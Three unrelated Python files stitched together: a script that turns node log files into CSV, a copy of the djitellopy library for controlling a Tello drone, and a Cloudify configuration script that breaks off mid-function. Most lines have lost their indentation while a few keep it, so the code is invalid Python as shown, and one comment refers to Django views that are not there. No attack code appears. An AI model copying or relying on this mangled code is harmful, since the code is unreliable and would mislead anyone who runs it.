# filename=file_path1+'HackNode'+str(i)+"/Process"+str(process)+".log"
# FR=open(outputfilename+"node"+str(i),'w')
# to_print = "".join(tail(filename,num))
# if re.search(pattern, to_print, re.I):
# FR.write(to_print)
# print(to_print)
# FR.close()
# i+=1
# def live(n, process, num, outputfilename):
# file_path1 = '/home/harsh/PycharmProjects/CloudInit/log_simulator/'
# delay = 0.1
# time.sleep(delay)
# i = 1
# while i <= n:
# filename = file_path1 + 'HackNode' + str(i) + "/Process" + str(process) + ".log"
# FR = open(outputfilename + "node" + str(i)+".csv", 'w')
# FR.write("Date,Timestamp,Tags,File,Exception" + "\n")
# FR.close()
# FR = open(outputfilename + "node" + str(i)+".csv", 'a+')
# to_print = "".join(tail(filename, num))
# to_print = to_print.split("\n")
# count = 0
# flag = 0
# for x in to_print:
# count += 1
# if ((re.match("^\d", x) == None)):
# if (x.split(" ")[0] == "Traceback"):
# flag = 4
#
# print(x)
# flag -= 1
# else:
# if (count > num):
# continue
# t = x.split(" ")
# a = " ".join(t[4:])
# b = ",".join(t[0:4])
# toprint = b + "," + a
# if (count != num):
# FR.write(toprint + "\n")
# # print(toprint)
# else:
# FR.write(toprint)
# # print(toprint)
#
# # to_print[5]= " ".join(to_print[5:])
# # to_print = ",".join(to_print[0:5])
# # print(to_print)
# print("\n")
# # if re.search(pattern, to_print, re.I):
# # FR.write(to_print)
# # print(to_print)
# FR.close()
# # with open(outputfilename+"node"+str(i),'r') as infile, open(outputfilename+"node_"+str(i), 'a+') as outfile:
# # for line in infile:
# # outfile.write(" ".join(line.split()).replace(' ', ','))
# # outfile.write(",")
# i += 1
def live(n, process, num, outputfilename):
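    # Dump the last `num` lines of each node's Process<process>.log into
    # <outputfilename>node<i>.csv as Date,Timestamp,Tags,File,Exception rows,
    # writing placeholder '-' columns for traceback/continuation lines.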
file_path1 = 'log_simulator/'
delay = 0.01
time.sleep(delay)
i = 1
while i <= n:
filename = file_path1 + 'HackNode' + str(i) + "/Process" + str(process) + ".log"
FR = open(outputfilename + "node" + str(i) + '.csv', 'w')
FR.write("Date,Timestamp,Tags,File,Exception" + "\n")
FR.close()
FR = open(outputfilename + "node" + str(i) + '.csv', 'a+')
to_print = "".join(tail(filename, num))
to_print = to_print.split("\n")
count = 0
for x in to_print:
count += 1
            if re.match(r"^\d", x) is None:
                if re.match(r"^\s", x) is not None:
y = x.split(",")
print(" - , - ," + y[0] + "," + y[1] + ", Traceback" + y[2])
FR.write(" - , - ," + y[0] + "," + y[1] + ", Traceback" + y[2] +"\n")
# print("-,-,"+x)
elif (x.split(" ")[0] == "Traceback"):
continue
else:
y = x.split(":")
if (len(y) > 1):
FR.write(" - , - , " + y[0] + " , - ," + y[1] + "\n")
print(" - , - , " + y[0] + " , - ," + y[1])
else:
if (count > num):
continue
t = x.split(" ")
a = " ".join(t[4:])
b = ",".join(t[0:4])
toprint = b + "," + a
if (count != num):
FR.write(toprint + "\n")
print(toprint)
else:
FR.write(toprint)
print(toprint)
# to_print[5]= " ".join(to_print[5:])
# to_print = ",".join(to_print[0:5])
# print(to_print)
print("\n")
# if re.search(pattern, to_print, re.I):
# FR.write(to_print)
# print(to_print)
FR.close()
# with open(outputfilename+"node"+str(i),'r') as infile, open(outputfilename+"node_"+str(i), 'a+') as outfile:
# for line in infile:
# outfile.write(" ".join(line.split()).replace(' ', ','))
# outfile.write(",")
i += 1
def tail(fi, n):
    # Return the last n lines of the file, seeking backwards in growing steps
    # until enough lines have been read (or the whole file has been scanned).
    assert n >= 0
    with open(fi, 'r') as f:
        pos, lines = n + 1, []
        while len(lines) <= n:
            try:
                f.seek(-pos, 2)
            except IOError:
                f.seek(0)
                break
            finally:
                lines = list(f)
                pos *= 2
    return lines[-n:]
def TimeData(n, p, start, end):
    startDate = start
    endDate = end
    print(startDate)
    print(endDate)
    date_re = re.compile(r'(\d+-\d+-\d+\,\d+:\d+:\d+)')
    with open("anode%d.csv" % n, "r") as fh, open("time.csv", "w") as FR:
        FR.write("Date,Timestamp,Tag,File,Exception" + "\n")
        for line in fh:
            match = date_re.search(line)
            if match is not None:
                matchDate = match.group(1)
                # Keep lines whose timestamp string falls within [startDate, endDate].
                if startDate <= matchDate <= endDate:
                    FR.write(line)
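# A minimal, self-contained sketch (not part of the Django views above) of what tail()
# returns; it only runs when this file is executed directly and assumes the module's
# imports are installed. The file it reads is a throwaway temporary file.
if __name__ == "__main__":
    import tempfile

    with tempfile.NamedTemporaryFile("w", suffix=".log", delete=False) as demo:
        demo.write("\n".join("line %d" % k for k in range(1, 11)) + "\n")
        demo_path = demo.name
    # Expected: the last three lines, e.g. ['line 8\n', 'line 9\n', 'line 10\n']
    print(tail(demo_path, 3))
    os.remove(demo_path)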
|
djitellopy.py
|
#
# Code from https://github.com/damiafuentes/DJITelloPy. Please install from the original GitHub repository; this copy is only for reference.
#
# coding=utf-8
import logging
import socket
import time
import threading
import cv2
from threading import Thread
from .decorators import accepts
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf
"""
# Send and receive commands, client socket
UDP_IP = '192.168.10.1'
UDP_PORT = 8889
RESPONSE_TIMEOUT = 7 # in seconds
TIME_BTW_COMMANDS = 1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.5 # in seconds
RETRY_COUNT = 3
last_received_command = time.time()
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('%(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# use logging.getLogger('djitellopy').setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
STATE_UDP_PORT = 8890
# VideoCapture object
cap = None
background_frame_read = None
stream_on = False
is_flying = False
# Tello state
pitch = -1
roll = -1
yaw = -1
speed_x = -1
speed_y = -1
speed_z = -1
temperature_lowest = -1
temperature_highest = -1
distance_tof = -1
height = -1
battery = -1
barometer = -1.0
flight_time = -1.0
acceleration_x = -1.0
acceleration_y = -1.0
acceleration_z = -1.0
attitude = {'pitch': -1, 'roll': -1, 'yaw': -1}
def __init__(self,
host='192.168.10.1',
port=8889,
client_socket=None,
enable_exceptions=True,
retry_count=3):
self.address = (host, port)
self.response = None
        self.response_state = None  # holds the state responses from the drone
self.stream_on = False
self.enable_exceptions = enable_exceptions
self.retry_count = retry_count
if client_socket:
self.clientSocket = client_socket
else:
self.clientSocket = socket.socket(socket.AF_INET, # Internet
socket.SOCK_DGRAM) # UDP
self.clientSocket.bind(('', self.UDP_PORT)) # For UDP response (receiving data)
self.stateSocket = socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)
self.stateSocket.bind(('', self.STATE_UDP_PORT)) # for accessing the states of Tello
        # Run the Tello UDP receiver in the background
        thread1 = threading.Thread(target=self.run_udp_receiver, args=())
        # Run the state receiver in the background
thread2 = threading.Thread(target=self.get_states, args=())
thread1.daemon = True
thread2.daemon = True
thread1.start()
thread2.start()
def run_udp_receiver(self):
"""Setup drone UDP receiver. This method listens for responses of Tello. Must be run from a background thread
in order to not block the main thread."""
while True:
try:
self.response, _ = self.clientSocket.recvfrom(1024) # buffer size is 1024 bytes
except Exception as e:
self.LOGGER.error(e)
break
def get_states(self):
"""This runs on background to recieve the state of Tello"""
while True:
try:
self.response_state, _ = self.stateSocket.recvfrom(256)
if self.response_state != 'ok':
self.response_state = self.response_state.decode('ASCII')
list = self.response_state.replace(';', ':').split(':')
self.pitch = int(list[1])
self.roll = int(list[3])
self.yaw = int(list[5])
self.speed_x = int(list[7])
self.speed_y = int(list[9])
self.speed_z = int(list[11])
self.temperature_lowest = int(list[13])
self.temperature_highest = int(list[15])
self.distance_tof = int(list[17])
self.height = int(list[19])
self.battery = int(list[21])
self.barometer = float(list[23])
self.flight_time = float(list[25])
self.acceleration_x = float(list[27])
self.acceleration_y = float(list[29])
self.acceleration_z = float(list[31])
self.attitude = {'pitch': int(list[1]), 'roll': int(list[3]), 'yaw': int(list[5])}
except Exception as e:
self.LOGGER.error(e)
self.LOGGER.error(f"Response was is {self.response_state}")
break
def get_udp_video_address(self):
return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self):
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
@accepts(command=str, printinfo=bool, timeout=int)
def send_command_with_return(self, command, printinfo=True, timeout=RESPONSE_TIMEOUT):
"""Send command to Tello and wait for its response.
Return:
bool: True for successful, False for unsuccessful
"""
        # Commands sent in quick succession can make the drone stop responding, so wait at least self.TIME_BTW_COMMANDS seconds between commands
diff = time.time() * 1000 - self.last_received_command
if diff < self.TIME_BTW_COMMANDS:
time.sleep(diff)
if printinfo:
self.LOGGER.info('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > timeout * 1000:
self.LOGGER.warning('Timeout exceed on command ' + command)
return False
try:
response = self.response.decode('utf-8').rstrip("\r\n")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return None
if printinfo:
self.LOGGER.info(f'Response {command}: {response}')
self.response = None
self.last_received_command = time.time() * 1000
return response
@accepts(command=str)
def send_command_without_return(self, command):
"""Send command to Tello without expecting a response. Use this method when you want to send a command
continuously
- go x y z speed: Tello fly to x y z in speed (cm/s)
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
- curve x1 y1 z1 x2 y2 z2 speed: Tello fly a curve defined by the current and two given coordinates with
            speed (cm/s). If the arc radius is not within the range of 0.5-10 meters, it responds with false.
            x/y/z can't all be between -20 and 20 at the same time.
x1, x2: 20-500
y1, y2: 20-500
z1, z2: 20-500
speed: 10-60
- rc a b c d: Send RC control via four channels.
a: left/right (-100~100)
b: forward/backward (-100~100)
c: up/down (-100~100)
d: yaw (-100~100)
"""
        # Send the command immediately; this method does not wait for or read a response
self.LOGGER.info('Send command (no expect response): ' + command)
self.clientSocket.sendto(command.encode('utf-8'), self.address)
@accepts(command=str, timeout=int)
def send_control_command(self, command, timeout=RESPONSE_TIMEOUT):
"""Send control command to Tello and wait for its response. Possible control commands:
- command: entry SDK mode
- takeoff: Tello auto takeoff
- land: Tello auto land
- streamon: Set video stream on
- streamoff: Set video stream off
- emergency: Stop all motors immediately
- up x: Tello fly up with distance x cm. x: 20-500
- down x: Tello fly down with distance x cm. x: 20-500
- left x: Tello fly left with distance x cm. x: 20-500
- right x: Tello fly right with distance x cm. x: 20-500
- forward x: Tello fly forward with distance x cm. x: 20-500
- back x: Tello fly back with distance x cm. x: 20-500
- cw x: Tello rotate x degree clockwise x: 1-3600
- ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
- flip x: Tello fly flip x
l (left)
r (right)
f (forward)
b (back)
- speed x: set speed to x cm/s. x: 10-100
- wifi ssid pass: Set Wi-Fi with SSID password
Return:
bool: True for successful, False for unsuccessful
"""
response = None
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if response == 'OK' or response == 'ok':
return True
return self.return_error_on_send_command(command, response, self.enable_exceptions)
@accepts(command=str, printinfo=bool)
def send_read_command(self, command, printinfo=True):
"""Send set command to Tello and wait for its response. Possible set commands:
- speed?: get current speed (cm/s): x: 1-100
- battery?: get current battery percentage: x: 0-100
- time?: get current fly time (s): time
- height?: get height (cm): x: 0-3000
- temp?: get temperature (°C): x: 0-90
- attitude?: get IMU attitude data: pitch roll yaw
- baro?: get barometer value (m): x
- tof?: get distance value from TOF (cm): x: 30-1000
- wifi?: get Wi-Fi SNR: snr
Return:
bool: The requested value for successful, False for unsuccessful
"""
response = self.send_command_with_return(command, printinfo=printinfo)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
if response.isdigit():
return int(response)
else:
try:
return float(response) # isdigit() is False when the number is a float(barometer)
except ValueError:
return response
else:
return self.return_error_on_send_command(command, response, self.enable_exceptions)
def return_error_on_send_command(self, command, response, enable_exceptions):
"""Returns False and print an informative result code to show unsuccessful response"""
msg = 'Command ' + command + ' was unsuccessful. Message: ' + str(response)
if enable_exceptions:
raise Exception(msg)
else:
self.LOGGER.error(msg)
return False
def connect(self):
"""Entry SDK mode
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("command")
def takeoff(self):
"""Tello auto takeoff
Returns:
bool: True for successful, False for unsuccessful
False: Unsuccessful
"""
        # Sometimes it takes a long time for the drone to take off and report a successful takeoff, so wait longer here; otherwise the following calls will fail.
if self.send_control_command("takeoff", timeout=20):
self.is_flying = True
return True
else:
return False
def land(self):
"""Tello auto land
Returns:
bool: True for successful, False for unsuccessful
"""
if self.send_control_command("land"):
self.is_flying = False
return True
else:
return False
def streamon(self):
"""Set video stream on. If the response is 'Unknown command' means you have to update the Tello firmware. That
can be done through the Tello app.
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamon")
if result is True:
self.stream_on = True
return result
def streamoff(self):
"""Set video stream off
Returns:
bool: True for successful, False for unsuccessful
"""
result = self.send_control_command("streamoff")
if result is True:
self.stream_on = False
return result
def emergency(self):
"""Stop all motors immediately
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("emergency")
@accepts(direction=str, x=int)
def move(self, direction, x):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command(direction + ' ' + str(x))
@accepts(x=int)
def move_up(self, x):
"""Tello fly up with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("up", x)
@accepts(x=int)
def move_down(self, x):
"""Tello fly down with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("down", x)
@accepts(x=int)
def move_left(self, x):
"""Tello fly left with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("left", x)
@accepts(x=int)
def move_right(self, x):
"""Tello fly right with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("right", x)
@accepts(x=int)
def move_forward(self, x):
"""Tello fly forward with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("forward", x)
@accepts(x=int)
def move_back(self, x):
"""Tello fly back with distance x cm.
Arguments:
x: 20-500
Returns:
bool: True for successful, False for unsuccessful
"""
return self.move("back", x)
@accepts(x=int)
def rotate_clockwise(self, x):
"""Tello rotate x degree clockwise.
Arguments:
x: 1-360
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("cw " + str(x))
@accepts(x=int)
def rotate_counter_clockwise(self, x):
"""Tello rotate x degree counter-clockwise.
Arguments:
x: 1-3600
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("ccw " + str(x))
@accepts(x=str)
def flip(self, direction):
"""Tello fly flip.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("flip " + direction)
def flip_left(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("l")
def flip_right(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("r")
def flip_forward(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("f")
def flip_back(self):
"""Tello fly flip left.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.flip("b")
@accepts(x=int, y=int, z=int, speed=int)
def go_xyz_speed(self, x, y, z, speed):
"""Tello fly to x y z in speed (cm/s)
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('go %s %s %s %s' % (x, y, z, speed))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int)
def curve_xyz_speed(self, x1, y1, z1, x2, y2, z2, speed):
"""Tello fly a curve defined by the current and two given coordinates with speed (cm/s).
        - If the arc radius is not within the range of 0.5-10 meters, it responds with false.
        - x/y/z can't all be between -20 and 20 at the same time.
Arguments:
x1: 20-500
x2: 20-500
y1: 20-500
y2: 20-500
z1: 20-500
z2: 20-500
speed: 10-60
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_command_without_return('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
@accepts(x=int, y=int, z=int, speed=int, mid=int)
def go_xyz_speed_mid(self, x, y, z, speed, mid):
"""Tello fly to x y z in speed (cm/s) relative to mission pad iwth id mid
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid))
@accepts(x1=int, y1=int, z1=int, x2=int, y2=int, z2=int, speed=int, mid=int)
def curve_xyz_speed_mid(self, x1, y1, z1, x2, y2, z2, speed, mid):
"""Tello fly to x2 y2 z2 over x1 y1 z1 in speed (cm/s) relative to mission pad with id mid
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid))
@accepts(x=int, y=int, z=int, speed=int, yaw=int, mid1=int, mid2=int)
def go_xyz_speed_yaw_mid(self, x, y, z, speed, yaw, mid1, mid2):
"""Tello fly to x y z in speed (cm/s) relative to mid1
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
return self.send_control_command("mon")
def disable_mission_pads(self):
return self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
return self.send_control_command("mdirection " + str(x))
@accepts(x=int)
def set_speed(self, x):
"""Set speed to x cm/s.
Arguments:
x: 10-100
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command("speed " + str(x))
last_rc_control_sent = 0
@accepts(left_right_velocity=int, forward_backward_velocity=int, up_down_velocity=int, yaw_velocity=int)
def send_rc_control(self, left_right_velocity, forward_backward_velocity, up_down_velocity, yaw_velocity):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
Returns:
bool: True for successful, False for unsuccessful
"""
if int(time.time() * 1000) - self.last_rc_control_sent < self.TIME_BTW_RC_CONTROL_COMMANDS:
pass
else:
self.last_rc_control_sent = int(time.time() * 1000)
return self.send_command_without_return('rc %s %s %s %s' % (self.round_to_100(left_right_velocity),
self.round_to_100(forward_backward_velocity),
self.round_to_100(up_down_velocity),
self.round_to_100(yaw_velocity)))
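    # For example (illustrative values, not from the original source): calling
    # tello.send_rc_control(0, 50, 0, 0) repeatedly keeps the drone moving forward
    # at half speed, while tello.send_rc_control(0, 0, 0, 0) makes it hover.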
@accepts(x=int)
def round_to_100(self, x):
if x > 100:
return 100
elif x < -100:
return -100
else:
return x
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
Returns:
bool: True for successful, False for unsuccessful
"""
return self.send_control_command('ap %s %s' % (ssid, password))
def get_speed(self):
"""Get current speed (cm/s)
Returns:
False: Unsuccessful
int: 1-100
"""
return self.send_read_command('speed?')
def get_battery(self):
"""Get current battery percentage
Returns:
False: Unsuccessful
            int: 0-100
"""
return self.send_read_command('battery?')
def get_flight_time(self):
"""Get current fly time (s)
Returns:
False: Unsuccessful
int: Seconds elapsed during flight.
"""
return self.send_read_command('time?')
def get_height(self):
"""Get height (cm)
Returns:
False: Unsuccessful
int: 0-3000
"""
return self.send_read_command('height?')
def get_temperature(self):
"""Get temperature (°C)
Returns:
False: Unsuccessful
int: 0-90
"""
return self.send_read_command('temp?')
def get_attitude(self):
"""Get IMU attitude data
Returns:
False: Unsuccessful
int: pitch roll yaw
"""
r = self.send_read_command('attitude?').replace(';', ':').split(':')
return dict(zip(r[::2], [int(i) for i in r[1::2]])) # {'pitch': xxx, 'roll': xxx, 'yaw': xxx}
def get_barometer(self):
"""Get barometer value (m)
Returns:
False: Unsuccessful
int: 0-100
"""
return self.send_read_command('baro?')
def get_distance_tof(self):
"""Get distance value from TOF (cm)
Returns:
False: Unsuccessful
int: 30-1000
"""
return self.send_read_command('tof?')
def get_wifi(self):
"""Get Wi-Fi SNR
Returns:
False: Unsuccessful
str: snr
"""
return self.send_read_command('wifi?')
def get_sdk_version(self):
"""Get SDK Version
Returns:
False: Unsuccessful
str: SDK Version
"""
return self.send_read_command('sdk?')
def get_serial_number(self):
"""Get Serial Number
Returns:
False: Unsuccessful
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
    This class reads frames from a VideoCapture in the background. Then, just call backgroundFrameRead.frame to get
    the most recent frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
def start(self):
Thread(target=self.update_frame, args=()).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
(self.grabbed, self.frame) = self.cap.read()
def stop(self):
self.stopped = True
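# A minimal usage sketch (illustrative only, not part of the original library), assuming
# a Tello is powered on and this machine is connected to its Wi-Fi network; in a separate
# script the typical call sequence looks roughly like this:
#
#     from djitellopy import Tello
#
#     tello = Tello()
#     if tello.connect():            # enter SDK mode
#         tello.takeoff()
#         tello.move_up(50)          # distances are in cm (20-500)
#         tello.rotate_clockwise(90)
#         tello.land()
#     tello.end()                    # land if needed, stop streaming, release resources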
|
_a4c_configure.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
    ctx.logger.info('Checking whether a mapping exists for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
    # If the mapping configuration exists and concerns SELF, just get the attribute using the mapped attribute name.
    # Else, if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET.
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
        ctx.logger.info('Attribute {0} not found, going up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
        ctx.logger.info('Property {0} not found, going up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
    ctx.logger.info('Checking whether a mapping exists for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
    # If the mapping configuration exists and concerns SELF, just get the attribute using the mapped attribute name.
    # Else, if it concerns TARGET, follow the relationship and retrieve the mapped attribute name from the TARGET.
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
